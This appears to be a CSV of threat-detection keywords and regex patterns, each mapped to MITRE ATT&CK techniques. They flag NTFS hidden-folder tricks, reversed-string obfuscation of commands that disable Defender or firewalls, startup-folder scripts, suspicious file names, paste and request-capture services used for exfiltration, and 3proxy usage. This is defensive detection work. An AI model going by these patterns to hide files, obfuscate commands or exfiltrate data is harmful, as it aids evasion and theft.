"keyword","metadata_keyword_regex","metadata_keyword_type","metadata_tool","metadata_description","metadata_tool_techniques","metadata_tool_tactics","metadata_malwares_name","metadata_groups_name","metadata_category","metadata_link","metadata_enable_endpoint_detection","metadata_enable_proxy_detection","metadata_tags","metadata_comment","metadata_severity_score","metadata_popularity_score","metadata_github_stars","metadata_github_forks","metadata_github_updated_at","metadata_github_created_at"
"*...::$index_allocation*",".{0,1000}\.\.\.\:\:\$index_allocation.{0,1000}","greyware_tool_keyword","$index_allocation","creation of hidden folders (and file) via ...$.......::$index_allocation","T1027.001 - T1564.001","TA0005 ","N/A","N/A","Defense Evasion","https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*cd *.::$index_allocation*",".{0,1000}cd\s.{0,1000}\.\:\:\$index_allocation.{0,1000}","greyware_tool_keyword","$index_allocation","creation of hidden folders (and file) via ...$.......::$index_allocation","T1027.001 - T1564.001","TA0005 ","N/A","N/A","Defense Evasion","https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*md *.::$index_allocation*",".{0,1000}md\s.{0,1000}\.\:\:\$index_allocation.{0,1000}","greyware_tool_keyword","$index_allocation","creation of hidden folders (and file) via ...$.......::$index_allocation","T1027.001 - T1564.001","TA0005 ","N/A","N/A","Defense Evasion","https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"* ecivreS-potS*",".{0,1000}\secivreS\-potS.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* gifnoc cs*",".{0,1000}\sgifnoc\scs.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* noitcetorPAUP*",".{0,1000}\snoitcetorPAUP.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*%tooRmetsyS%*",".{0,1000}\%tooRmetsyS\%.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*..\..\..\..\..\..\Windows\System32\cmd.exe*",".{0,1000}\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\Windows\\System32\\cmd\.exe.{0,1000}","greyware_tool_keyword","_","attempt to bypass security controls or execute commands from an unexpected location","T1036 - T1059","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://twitter.com/malwrhunterteam/status/1737220172220620854/photo/1","1","0","N/A","N/A","7","9","N/A","N/A","N/A","N/A"
"*/keygen.exe*",".{0,1000}\/keygen\.exe.{0,1000}","greyware_tool_keyword","_","generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malwares","T1204 - T1027 - T1059 - T1055 - T1060 - T1195","TA0005 - TA0002 - TA0011","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/PAYMENTS.exe*",".{0,1000}\/PAYMENTS\.exe.{0,1000}","greyware_tool_keyword","_","suspicious file name - has been used by threat actors","T1566","TA0001","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\1.bat",".{0,1000}\\1\.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\1.dll",".{0,1000}\\1\.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\1.exe",".{0,1000}\\1\.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\2.bat",".{0,1000}\\2\.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\2.dll",".{0,1000}\\2\.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\2.exe",".{0,1000}\\2\.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\3.bat",".{0,1000}\\3\.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\3.dll",".{0,1000}\\3\.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\3.exe",".{0,1000}\\3\.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\4.bat",".{0,1000}\\4\.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\4.dll",".{0,1000}\\4\.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\4.exe",".{0,1000}\\4\.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\5.bat",".{0,1000}\\5\.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\5.dll",".{0,1000}\\5\.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\5.exe",".{0,1000}\\5\.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\6.bat",".{0,1000}\\6\.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\6.dll",".{0,1000}\\6\.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\6.exe",".{0,1000}\\6\.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\7.bat",".{0,1000}\\7\.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\7.dll",".{0,1000}\\7\.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\7.exe",".{0,1000}\\7\.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\8.bat",".{0,1000}\\8\.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\8.dll",".{0,1000}\\8\.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\8.exe",".{0,1000}\\8\.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\9.bat",".{0,1000}\\9\.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\9.dll",".{0,1000}\\9\.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\9.exe",".{0,1000}\\9\.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.bat*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.bat.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.cmd*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.cmd.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.hta*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.hta.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.ps1*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.ps1.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.vbs.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A"
"*\keygen.exe*",".{0,1000}\\keygen\.exe.{0,1000}","greyware_tool_keyword","_","generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malwares","T1204 - T1027 - T1059 - T1055 - T1060 - T1195","TA0005 - TA0002 - TA0011","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*\PAYMENT.hta*",".{0,1000}\\PAYMENT\.hta.{0,1000}","greyware_tool_keyword","_","suspicious file name - has been used by threat actors","T1566","TA0001","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\PAYMENT.hta*",".{0,1000}\\PAYMENT\.hta.{0,1000}","greyware_tool_keyword","_","suspicious file name - has been used by threat actors","T1566","TA0001","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\PAYMENTS.exe*",".{0,1000}\\PAYMENTS\.exe.{0,1000}","greyware_tool_keyword","_","suspicious file name - has been used by threat actors","T1566","TA0001","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*c/ exe.dmc*",".{0,1000}c\/\sexe\.dmc.{0,1000}","greyware_tool_keyword","_","reversed string cmd.exe /c obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*c:\*\\u0*\\u0*\\u0*\\u0*",".{0,1000}c\:\\.{0,1000}\\\\u0.{0,1000}\\\\u0.{0,1000}\\\\u0.{0,1000}\\\\u0.{0,1000}","greyware_tool_keyword","_","file path containing mixed Unicode-escaped and ASCII characters to evade detection","T1036  - T1027","TA0005","N/A","N/A","Defense Evasion","https://cloud.google.com/blog/topics/threat-intelligence/melting-unc2198-icedid-to-ransomware-operations","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A"
"*delbasiD epyTputratS- *",".{0,1000}delbasiD\sepyTputratS\-\s.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ecnereferPpM-teS*",".{0,1000}ecnereferPpM\-teS.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*eliforPllaweriFteN-teS*",".{0,1000}eliforPllaweriFteN\-teS.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*exe.23lldnur*",".{0,1000}exe\.23lldnur.{0,1000}","greyware_tool_keyword","_","reversed string rundll32.exe obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*exe.erolpxei*",".{0,1000}exe\.erolpxei.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*exe.rerolpxe*",".{0,1000}exe\.rerolpxe.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*exe.ssasl*",".{0,1000}exe\.ssasl.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*exe.tsohcvs*",".{0,1000}exe\.tsohcvs.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*gnirotinoMemitlaeRelbasiD*",".{0,1000}gnirotinoMemitlaeRelbasiD.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://requestbin.net/r/*",".{0,1000}https\:\/\/requestbin\.net\/r\/.{0,1000}","greyware_tool_keyword","_","allows users to create a unique URL to collect and inspect HTTP requests. It is commonly used for debugging webhooks - it can also be abused by attackers for verifying the reachability and effectiveness of their payloads","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","http://requestbin.net","1","1","N/A","Out of band interaction domains","10","10","N/A","N/A","N/A","N/A"
"*llawerifvda hsten*",".{0,1000}llawerifvda\shsten.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*niB.elcyceR$*",".{0,1000}niB\.elcyceR\$.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*teSlortnoCtnerruC*",".{0,1000}teSlortnoCtnerruC.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"https://*.xyz/*.ps1","http.*\.(country|stream|gdn|mom|xin|kim|men|loan|download|racing|online|science|ren|gb|win|top|review|vip|party|tech|xyz|date|faith|cricket|space|info|vn|cm|am|cc|asia|ws|tk|biz|su|st|ge|pk|nu|me|ph|to|tt|name|tv|kz|tc|mobi|study|click|link|trade|accountant|cf|gq|ml|ga|pw)\/.*\.(exe|vbs|bat|rar|ps1|doc|docm|xls|xlsm|pptm|rtf|hta|dll|ws|wsf|sct|zip|bin)$","greyware_tool_keyword","_","Suspicious tlds with suspicious file types","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*0bin - encrypted pastebin*",".{0,1000}0bin\s\-\sencrypted\spastebin.{0,1000}","greyware_tool_keyword","0bin.net","Accessing a paste on 0bin.net","T1213 - T1190","TA0001 - TA0009 - TA0010","N/A","N/A","Collection","https://0bin.net","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*A client side encrypted PasteBin*",".{0,1000}A\sclient\sside\sencrypted\sPasteBin.{0,1000}","greyware_tool_keyword","0bin.net","Accessing a paste on 0bin.net","T1213 - T1190","TA0001 - TA0009 - TA0010","N/A","N/A","Collection","https://0bin.net","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*https://0bin.net/paste/*+*",".{0,1000}https\:\/\/0bin\.net\/paste\/.{0,1000}\+.{0,1000}","greyware_tool_keyword","0bin.net","Accessing a paste on 0bin.net","T1213 - T1190","TA0001 - TA0009 - TA0010","N/A","N/A","Collection","https://0bin.net","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*https://0bin.net/paste/create*",".{0,1000}https\:\/\/0bin\.net\/paste\/create.{0,1000}","greyware_tool_keyword","0bin.net","Creating a paste on 0bin.net","T1213 - T1190","TA0001 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://0bin.net","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*fcfhplploccackoneaefokcmbjfbkenj*",".{0,1000}fcfhplploccackoneaefokcmbjfbkenj.{0,1000}","greyware_tool_keyword","1clickVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*www.1secmail.com/api/v1/?action=*",".{0,1000}www\.1secmail\.com\/api\/v1\/\?action\=.{0,1000}","greyware_tool_keyword","1secmail.com","using the API of 1secmail (temporary email service) could be abused by malicious actors - observed in SafeBreach-Labs/DoubleDrive tool","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","https://www.1secmail.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://1ty.me/*",".{0,1000}https\:\/\/1ty\.me\/.{0,1000}","greyware_tool_keyword","1ty.me","temporary notes service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","N/A","Collection","https://1ty.me","1","1","N/A","downloading or uploading data","10","10","N/A","N/A","N/A","N/A"
"*https://1ty.me/?mode=ajax&cmd=create_note*",".{0,1000}https\:\/\/1ty\.me\/\?mode\=ajax\&cmd\=create_note.{0,1000}","greyware_tool_keyword","1ty.me","temporary notes service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://1ty.me","1","1","N/A","creating note","10","10","N/A","N/A","N/A","N/A"
"*/3proxy-*.deb*",".{0,1000}\/3proxy\-.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","1","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*/3proxy-*.rpm*",".{0,1000}\/3proxy\-.{0,1000}\.rpm.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","1","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*/3proxy-*.zip*",".{0,1000}\/3proxy\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","1","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*/3proxy.exe*",".{0,1000}\/3proxy\.exe.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","1","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*/3proxy.git*",".{0,1000}\/3proxy\.git.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","1","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*/3proxy.log*",".{0,1000}\/3proxy\.log.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","1","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*/etc/3proxy/conf*",".{0,1000}\/etc\/3proxy\/conf.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*\3proxy-*.deb*",".{0,1000}\\3proxy\-.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*\3proxy-*.rpm*",".{0,1000}\\3proxy\-.{0,1000}\.rpm.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*\3proxy-*.zip*",".{0,1000}\\3proxy\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*\3proxy.cfg*",".{0,1000}\\3proxy\.cfg.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*\3proxy.exe*",".{0,1000}\\3proxy\.exe.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*\3proxy.key*",".{0,1000}\\3proxy\.key.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*\3proxy.log*",".{0,1000}\\3proxy\.log.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*\bin\3proxy*",".{0,1000}\\bin\\3proxy.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*128s3proxy.key""*",".{0,1000}128s3proxy\.key\"".{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*3proxy --install*",".{0,1000}3proxy\s\-\-install.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*3proxy --remove*",".{0,1000}3proxy\s\-\-remove.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
